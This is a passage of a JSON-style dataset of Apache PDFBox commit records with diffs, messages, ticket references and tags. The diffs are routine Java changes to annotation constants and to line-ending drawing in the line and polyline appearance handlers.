https://svn.apache.org/repos/asf/pdfbox/trunk@1834147 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", + "index 913c49a0e..4dcf1b9e8 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", + "@@ -99,3 +99,18 @@ public class PDAnnotationText extends PDAnnotationMarkup", + " */", + "- public static final String NAME_RIGHT_POINTER = \"RightPointer\"; ", + "+ public static final String NAME_RIGHT_POINTER = \"RightPointer\";", + "+", + "+ /**", + "+ * Constant for the name of a crosshairs annotation.", + "+ */", + "+ public static final String NAME_UP_ARROW = \"UpArrow\"; ", + "+", + "+ /**", + "+ * Constant for the name of a crosshairs annotation.", + "+ */", + "+ public static final String NAME_UP_LEFT_ARROW = \"UpLeftArrow\"; ", + "+", + "+ /**", + "+ * Constant for the name of a crosshairs annotation.", + "+ */", + "+ public static final String NAME_CROSS_HAIRS = \"CrossHairs\"; " + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "dab190b906da7d0b2f30523a2b461d37f7d12dff", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1526757317, + "hunks": 15, + "message": "PDFBOX-3353: draw line endings git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831914 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "index 7be318260..74f4bfc06 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "@@ -30,3 +30,8 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationPolyline;", + " import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine;", + "+import static org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine.LE_NONE;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderStyleDictionary;", + "+import static org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDAbstractAppearanceHandler.INTERIOR_COLOR_STYLES;", + "+import static org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDLineAppearanceHandler.ARROW_ANGLE;", + "+import org.apache.pdfbox.util.Matrix;", + "@@ -86,6 +91,7 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "- rect.setLowerLeftX(Math.min(minX - ab.width / 2, rect.getLowerLeftX()));", + "- rect.setLowerLeftY(Math.min(minY - ab.width / 2, rect.getLowerLeftY()));", + "- rect.setUpperRightX(Math.max(maxX + ab.width, rect.getUpperRightX()));", + "- rect.setUpperRightY(Math.max(maxY + ab.width, rect.getUpperRightY()));", + "+ // arrow length is 9 * width at about 30\u00c2\u00b0 => 10 * width seems to be enough", + "+ rect.setLowerLeftX(Math.min(minX - ab.width * 10, rect.getLowerLeftX()));", + "+ rect.setLowerLeftY(Math.min(minY - ab.width * 10, rect.getLowerLeftY()));", + "+ rect.setUpperRightX(Math.max(maxX + ab.width * 10, rect.getUpperRightX()));", + "+ rect.setUpperRightY(Math.max(maxY + ab.width * 10, rect.getUpperRightY()));", + " annotation.setRectangle(rect);", + "@@ -96,3 +102,5 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "+ boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getInteriorColor());", + " setOpacity(cs, annotation.getConstantOpacity());", + "+ boolean hasStroke = cs.setStrokingColorOnDemand(color);", + "@@ -114,6 +122,5 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", + " // modify coordinate to shorten the segment", + "+ // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", + " float x1 = pathsArray[2];", + " float y1 = pathsArray[3];", + "-", + "- // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", + " float len = (float) (Math.sqrt(Math.pow(x - x1, 2) + Math.pow(y - y1, 2)));", + "@@ -127,11 +134,11 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "- else if (i == pathsArray.length / 2 - 1)", + "+ else", + " {", + "- if (SHORT_STYLES.contains(annotation.getEndPointEndingStyle()))", + "+ if (i == pathsArray.length / 2 - 1 &&", + "+ SHORT_STYLES.contains(annotation.getEndPointEndingStyle()))", + " {", + " // modify coordinate to shorten the segment", + "+ // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", + " float x0 = pathsArray[pathsArray.length - 4];", + " float y0 = pathsArray[pathsArray.length - 3];", + "-", + "- // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", + " float len = (float) (Math.sqrt(Math.pow(x0 - x, 2) + Math.pow(y0 - y, 2)));", + "@@ -145,15 +152,37 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "- else", + "- {", + "- cs.lineTo(x, y);", + "- }", + " }", + "- //TODO line endings (LE) are missing", + "- // How it could be done by reusing some of the code from the line handler", + "- // 1) do a transform so that first and last \"arms\" are imagined flat", + "- // (like in line handler)", + "- // 2) refactor + reuse the line handler code that draws the ending shapes", + "+ cs.stroke();", + "+", + "+ // do a transform so that first and last \"arms\" are imagined flat, like in line handler", + " // the alternative would be to apply the transform to the LE shapes directly,", + " // which would be more work and produce code difficult to understand", + "- cs.stroke();", + "+", + "+ // this must be done after polyline draw, to avoid line crossing a filled shape", + "+ if (!LE_NONE.equals(annotation.getStartPointEndingStyle()))", + "+ {", + "+ // check only needed to avoid q cm Q if LE_NONE", + "+ float x2 = pathsArray[2];", + "+ float y2 = pathsArray[3];", + "+ float x1 = pathsArray[0];", + "+ float y1 = pathsArray[1];", + "+ cs.saveGraphicsState();", + "+ double angle = Math.atan2(y2 - y1, x2 - x1);", + "+ cs.transform(Matrix.getRotateInstance(angle, x1, y1));", + "+ drawStyle(annotation.getStartPointEndingStyle(), cs, 0, 0, ab.width, hasStroke, hasBackground);", + "+ cs.restoreGraphicsState();", + "+ }", + "+", + "+ if (!LE_NONE.equals(annotation.getEndPointEndingStyle()))", + "+ {", + "+ // check only needed to avoid q cm Q if LE_NONE", + "+ float x1 = pathsArray[pathsArray.length - 4];", + "+ float y1 = pathsArray[pathsArray.length - 3];", + "+ float x2 = pathsArray[pathsArray.length - 2];", + "+ float y2 = pathsArray[pathsArray.length - 1];", + "+ // save / restore not needed because it's the last one", + "+ double angle = Math.atan2(y2 - y1, x2 - x1);", + "+ cs.transform(Matrix.getRotateInstance(angle, x1, y1));", + "+ float lineLength = (float) Math.sqrt(((x2 - x1) * (x2 - x1)) + ((y2 - y1) * (y2 - y1)));", + "+ drawStyle(annotation.getEndPointEndingStyle(), cs, lineLength, 0, ab.width, hasStroke, hasBackground);", + "+ }", + " }", + "@@ -220,2 +249,140 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "+", + "+ //TODO refactor to remove double code drawStyle and related", + "+ // (100% copied from line handler)", + "+", + "+ private void drawStyle(String style, final PDAppearanceContentStream cs, float x, float y,", + "+ float width, boolean hasStroke, boolean hasBackground) throws IOException", + "+ {", + "+ switch (style)", + "+ {", + "+ case PDAnnotationLine.LE_OPEN_ARROW:", + "+ case PDAnnotationLine.LE_CLOSED_ARROW:", + "+ if (Float.compare(x, 0) != 0)", + "+ {", + "+ // ending", + "+ drawArrow(cs, x - width, y, -width * 9);", + "+ }", + "+ else", + "+ {", + "+ // start", + "+ drawArrow(cs, width, y, width * 9);", + "+ }", + "+ if (PDAnnotationLine.LE_CLOSED_ARROW.equals(style))", + "+ {", + "+ cs.closePath();", + "+ }", + "+ break;", + "+ case PDAnnotationLine.LE_BUTT:", + "+ cs.moveTo(x, y - width * 3);", + "+ cs.lineTo(x, y + width * 3);", + "+ break;", + "+ case PDAnnotationLine.LE_DIAMOND:", + "+ drawDiamond(cs, x, y, width * 3);", + "+ break;", + "+ case PDAnnotationLine.LE_SQUARE:", + "+ cs.addRect(x - width * 3, y - width * 3, width * 6, width * 6);", + "+ break;", + "+ case PDAnnotationLine.LE_CIRCLE:", + "+ addCircle(cs, x, y, width * 3);", + "+ break;", + "+ case PDAnnotationLine.LE_R_OPEN_ARROW:", + "+ case PDAnnotationLine.LE_R_CLOSED_ARROW:", + "+ if (Float.compare(x, 0) != 0)", + "+ {", + "+ // ending", + "+ drawArrow(cs, x + width, y, width * 9);", + "+ }", + "+ else", + "+ {", + "+ // start", + "+ drawArrow(cs, -width, y, -width * 9);", + "+ }", + "+ if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(style))", + "+ {", + "+ cs.closePath();", + "+ }", + "+ break;", + "+ case PDAnnotationLine.LE_SLASH:", + "+ // the line is 18 x linewidth at an angle of 60\u00c2\u00b0", + "+ cs.moveTo(x + (float) (Math.cos(Math.toRadians(60)) * width * 9),", + "+ y + (float) (Math.sin(Math.toRadians(60)) * width * 9));", + "+ cs.lineTo(x + (float) (Math.cos(Math.toRadians(240)) * width * 9),", + "+ y + (float) (Math.sin(Math.toRadians(240)) * width * 9));", + "+ break;", + "+ default:", + "+ break;", + "+ }", + "+ if (INTERIOR_COLOR_STYLES.contains(style))", + "+ {", + "+ cs.drawShape(width, hasStroke, hasBackground);", + "+ }", + "+ else if (!PDAnnotationLine.LE_NONE.equals(style))", + "+ {", + "+ // need to do this separately, because sometimes /IC is set anyway", + "+ cs.drawShape(width, hasStroke, false);", + "+ }", + "+ }", + "+", + "+ /**", + "+ * Add the two arms of a horizontal arrow.", + "+ * ", + "+ * @param cs Content stream", + "+ * @param x", + "+ * @param y", + "+ * @param len The arm length. Positive goes to the right, negative goes to the left.", + "+ * ", + "+ * @throws IOException If the content stream could not be written", + "+ */", + "+ private void drawArrow(PDAppearanceContentStream cs, float x, float y, float len) throws IOException", + "+ {", + "+ // strategy for arrows: angle 30\u00c2\u00b0, arrow arm length = 9 * line width", + "+ // cos(angle) = x position", + "+ // sin(angle) = y position", + "+ // this comes very close to what Adobe is doing", + "+ cs.moveTo(x + (float) (Math.cos(ARROW_ANGLE) * len), y + (float) (Math.sin(ARROW_ANGLE) * len));", + "+ cs.lineTo(x, y);", + "+ cs.lineTo(x + (float) (Math.cos(ARROW_ANGLE) * len), y - (float) (Math.sin(ARROW_ANGLE) * len));", + "+ }", + "+", + "+ /**", + "+ * Add a square diamond shape (corner on top) to the path.", + "+ *", + "+ * @param cs Content stream", + "+ * @param x", + "+ * @param y", + "+ * @param r Radius (to a corner)", + "+ * ", + "+ * @throws IOException If the content stream could not be written", + "+ */", + "+ private void drawDiamond(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", + "+ {", + "+ cs.moveTo(x - r, y);", + "+ cs.lineTo(x, y + r);", + "+ cs.lineTo(x + r, y);", + "+ cs.lineTo(x, y - r);", + "+ cs.closePath();", + "+ }", + "+", + "+ /**", + "+ * Add a circle shape to the path.", + "+ *", + "+ * @param cs Content stream", + "+ * @param x", + "+ * @param y", + "+ * @param r Radius", + "+ * ", + "+ * @throws IOException If the content stream could not be written", + "+ */", + "+ private void addCircle(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", + "+ {", + "+ // http://stackoverflow.com/a/2007782/535646", + "+ float magic = r * 0.551784f;", + "+ cs.moveTo(x, y + r);", + "+ cs.curveTo(x + magic, y + r, x + r, y + magic, x + r, y);", + "+ cs.curveTo(x + r, y - magic, x + magic, y - r, x, y - r);", + "+ cs.curveTo(x - magic, y - r, x - r, y - magic, x - r, y);", + "+ cs.curveTo(x - r, y + magic, x - magic, y + r, x, y + r);", + "+ cs.closePath();", + "+ }", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "156003b56776cfeba3116b1f8a73337b297a1b13", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524336114, + "hunks": 1, + "message": "PDFBOX-4071: add override git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829741 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/HeaderTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/HeaderTable.java", + "index 42c8b277d..a9ba6c9d4 100644", + "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/HeaderTable.java", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/HeaderTable.java", + "@@ -73,2 +73,3 @@ public class HeaderTable extends TTFTable", + " */", + "+ @Override", + " public void read(TrueTypeFont ttf, TTFDataStream data) throws IOException" + ], + "changed_files": [ + "fontbox/src/main/java/org/apache/fontbox/ttf/HeaderTable.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "231a05e789db84f7653c7b07fe5b88b2054fea93", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532798312, + "hunks": 16, + "message": "PDFBOX-3353: special handling for very small widths: don't draw borders, but draw the line, line ending shapes must be calculated based on size 1 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836936 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "index 3e7310564..ee03faee1 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "@@ -96,2 +96,7 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + "+ // observed with diagonal line of AnnotationSample.Standard.pdf", + "+ // for line endings, very small widths must be treated as size 1.", + "+ // However the border of the line ending shapes is not drawn.", + "+ float lineEndingSize = (ab.width < 1e-5) ? 1 : ab.width;", + "+", + " // add/substract with, font height, and arrows", + "@@ -100,6 +105,6 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " //TODO find better way to calculate padding", + "- rect.setLowerLeftX(Math.min(minX - Math.max(ab.width * 10, Math.abs(llo+ll+lle)), rect.getLowerLeftX()));", + "- rect.setLowerLeftY(Math.min(minY - Math.max(ab.width * 10, Math.abs(llo+ll+lle)), rect.getLowerLeftY()));", + "- rect.setUpperRightX(Math.max(maxX + Math.max(ab.width * 10, Math.abs(llo+ll+lle)), rect.getUpperRightX()));", + "- rect.setUpperRightY(Math.max(maxY + Math.max(ab.width * 10, Math.abs(llo+ll+lle)), rect.getUpperRightY()));", + "+ rect.setLowerLeftX(Math.min(minX - Math.max(lineEndingSize * 10, Math.abs(llo+ll+lle)), rect.getLowerLeftX()));", + "+ rect.setLowerLeftY(Math.min(minY - Math.max(lineEndingSize * 10, Math.abs(llo+ll+lle)), rect.getLowerLeftY()));", + "+ rect.setUpperRightX(Math.max(maxX + Math.max(lineEndingSize * 10, Math.abs(llo+ll+lle)), rect.getUpperRightX()));", + "+ rect.setUpperRightY(Math.max(maxY + Math.max(lineEndingSize * 10, Math.abs(llo+ll+lle)), rect.getUpperRightY()));", + "@@ -183,3 +188,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "- cs.moveTo(ab.width, y);", + "+ cs.moveTo(lineEndingSize, y);", + " }", + "@@ -200,4 +205,4 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + "- cs.lineTo(xOffset - ab.width, y);", + "- cs.moveTo(lineLength - xOffset + ab.width, y);", + "+ cs.lineTo(xOffset - lineEndingSize, y);", + "+ cs.moveTo(lineLength - xOffset + lineEndingSize, y);", + " }", + "@@ -205,3 +210,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "- cs.lineTo(lineLength - ab.width, y);", + "+ cs.lineTo(lineLength - lineEndingSize, y);", + " }", + "@@ -211,3 +216,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "- cs.drawShape(ab.width, hasStroke, false);", + "+ cs.drawShape(lineEndingSize, hasStroke, false);", + "@@ -233,3 +238,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " cs.lineTo(0 + lineLength / 2, y + captionVerticalOffset);", + "- cs.drawShape(ab.width, hasStroke, false);", + "+ cs.drawShape(lineEndingSize, hasStroke, false);", + " }", + "@@ -240,3 +245,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "- cs.moveTo(ab.width, y);", + "+ cs.moveTo(lineEndingSize, y);", + " }", + "@@ -248,3 +253,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "- cs.lineTo(lineLength - ab.width, y);", + "+ cs.lineTo(lineLength - lineEndingSize, y);", + " }", + "@@ -254,6 +259,6 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "- cs.drawShape(ab.width, hasStroke, false);", + "+ cs.drawShape(lineEndingSize, hasStroke, false);", + " }", + " cs.restoreGraphicsState();", + "-", + "+ ", + " // paint the styles here and not before showing the text, or the text would appear", + "@@ -262,2 +267,10 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + "+ // observed with diagonal line of file AnnotationSample.Standard.pdf", + "+ // when width is very small, the border of the line ending shapes ", + "+ // is not drawn.", + "+ if (ab.width < 1e-5)", + "+ {", + "+ hasStroke = false;", + "+ }", + "+", + " // check for LE_NONE only needed to avoid q cm Q for that case", + "@@ -269,3 +282,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " cs.transform(Matrix.getRotateInstance(angle, x1, y1));", + "- drawStyle(annotation.getStartPointEndingStyle(), cs, 0, y, ab.width, hasStroke, hasBackground);", + "+ drawStyle(annotation.getStartPointEndingStyle(), cs, 0, y, lineEndingSize, hasStroke, hasBackground);", + " }", + "@@ -280,3 +293,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " cs.transform(Matrix.getTranslateInstance(xx1, yy1));", + "- drawStyle(annotation.getStartPointEndingStyle(), cs, 0, 0, ab.width, hasStroke, hasBackground);", + "+ drawStyle(annotation.getStartPointEndingStyle(), cs, 0, 0, lineEndingSize, hasStroke, hasBackground);", + " }", + "@@ -296,3 +309,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " cs.transform(Matrix.getRotateInstance(angle, x1, y1));", + "- drawStyle(annotation.getEndPointEndingStyle(), cs, lineLength, y, ab.width, hasStroke, hasBackground);", + "+ drawStyle(annotation.getEndPointEndingStyle(), cs, lineLength, y, lineEndingSize, hasStroke, hasBackground);", + " }", + "@@ -307,3 +320,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " cs.transform(Matrix.getTranslateInstance(xx2, yy2));", + "- drawStyle(annotation.getEndPointEndingStyle(), cs, 0, 0, ab.width, hasStroke, hasBackground);", + "+ drawStyle(annotation.getEndPointEndingStyle(), cs, 0, 0, lineEndingSize, hasStroke, hasBackground);", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "273aa2a81340fcc982cd867d1d1776fcfb892575", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1526743409, + "hunks": 3, + "message": "PDFBOX-3353: modify coordinate of line ending if there is a short style; don't do anything if path array is smaller than 4 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831901 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "index 160f39289..fe8ab0b7e 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "@@ -59,3 +59,3 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", + " float[] pathsArray = annotation.getVertices();", + "- if (pathsArray == null)", + "+ if (pathsArray == null || pathsArray.length < 4)", + " {", + "@@ -111,4 +111,36 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "+ if (SHORT_STYLES.contains(annotation.getStartPointEndingStyle()))", + "+ {", + "+ // modify coordinate to shorten the segment", + "+ float x1 = pathsArray[2];", + "+ float y1 = pathsArray[3];", + "+", + "+ // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", + "+ float len = (float) (Math.sqrt(Math.pow(x - x1, 2) + Math.pow(y - y1, 2)));", + "+ if (Float.compare(len, 0) != 0)", + "+ {", + "+ x += (x1 - x) / len * ab.width;", + "+ y += (y1 - y) / len * ab.width;", + "+ }", + "+ }", + " cs.moveTo(x, y);", + " }", + "+ else if (i == pathsArray.length / 2 - 1)", + "+ {", + "+ if (SHORT_STYLES.contains(annotation.getEndPointEndingStyle()))", + "+ {", + "+ // modify coordinate to shorten the segment", + "+ float x0 = pathsArray[pathsArray.length - 4];", + "+ float y0 = pathsArray[pathsArray.length - 3];", + "+", + "+ // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", + "+ float len = (float) (Math.sqrt(Math.pow(x0 - x, 2) + Math.pow(y0 - y, 2)));", + "+ if (Float.compare(len, 0) != 0)", + "+ {", + "+ x -= (x - x0) / len * ab.width;", + "+ y -= (y - y0) / len * ab.width;", + "+ }", + "+ }", + "+ cs.lineTo(x, y);", + "+ }", + " else" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "594e42213d970aef4bec38d2e9802bef0a1df0e1", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528141979, + "hunks": 1, + "message": "PDFBOX-3353: add a //TODO for the work not done git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832888 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "index 00ba5c394..589cb7911 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "@@ -253,2 +253,5 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getInteriorColor());", + "+ //TODO support non-angled styles. This is more difficult than in the other handlers", + "+ // because the lines do not always go from (x1,y1) to (x2,y2) due to the leader lines", + "+ // when the \"y\" value above is not 0.", + " drawStyle(annotation.getStartPointEndingStyle(), cs, 0, y, ab.width, hasStroke, hasBackground);" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "f26f397e05ef27763568566791449dac80e5657c", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1526748884, + "hunks": 15, + "message": "PDFBOX-3353: refactor, extract line ending style drawing git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831909 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "index 7bff8b71b..36bf7552c 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "@@ -256,110 +256,83 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getInteriorColor());", + "- String startPointEndingStyle = annotation.getStartPointEndingStyle();", + "- switch (startPointEndingStyle)", + "+ ", + "+ drawStyle(annotation.getStartPointEndingStyle(), cs, 0, y, ab.width, hasStroke, hasBackground);", + "+ drawStyle(annotation.getEndPointEndingStyle(), cs, lineLength, y, ab.width, hasStroke, hasBackground);", + "+ }", + "+ }", + "+ catch (IOException ex)", + "+ {", + "+ LOG.error(ex);", + "+ }", + "+ }", + "+", + "+ private void drawStyle(String style, final PDAppearanceContentStream cs, float x, float y,", + "+ float width, boolean hasStroke, boolean hasBackground) throws IOException", + "+ {", + "+ switch (style)", + "+ {", + "+ case PDAnnotationLine.LE_OPEN_ARROW:", + "+ case PDAnnotationLine.LE_CLOSED_ARROW:", + "+ if (Float.compare(x, 0) != 0)", + " {", + "- case PDAnnotationLine.LE_OPEN_ARROW:", + "- case PDAnnotationLine.LE_CLOSED_ARROW:", + "- drawArrow(cs, ab.width, y, ab.width * 9);", + "- if (PDAnnotationLine.LE_CLOSED_ARROW.equals(startPointEndingStyle))", + "- {", + "- cs.closePath();", + "- }", + "- break;", + "- case PDAnnotationLine.LE_BUTT:", + "- cs.moveTo(0, y - ab.width * 3);", + "- cs.lineTo(0, y + ab.width * 3);", + "- break;", + "- case PDAnnotationLine.LE_DIAMOND:", + "- drawDiamond(cs, 0, y, ab.width * 3);", + "- break;", + "- case PDAnnotationLine.LE_SQUARE:", + "- cs.addRect(0 - ab.width * 3, y - ab.width * 3, ab.width * 6, ab.width * 6);", + "- break;", + "- case PDAnnotationLine.LE_CIRCLE:", + "- addCircle(cs, 0, y, ab.width * 3);", + "- break;", + "- case PDAnnotationLine.LE_R_OPEN_ARROW:", + "- case PDAnnotationLine.LE_R_CLOSED_ARROW:", + "- drawArrow(cs, -ab.width, y, -ab.width * 9);", + "- if 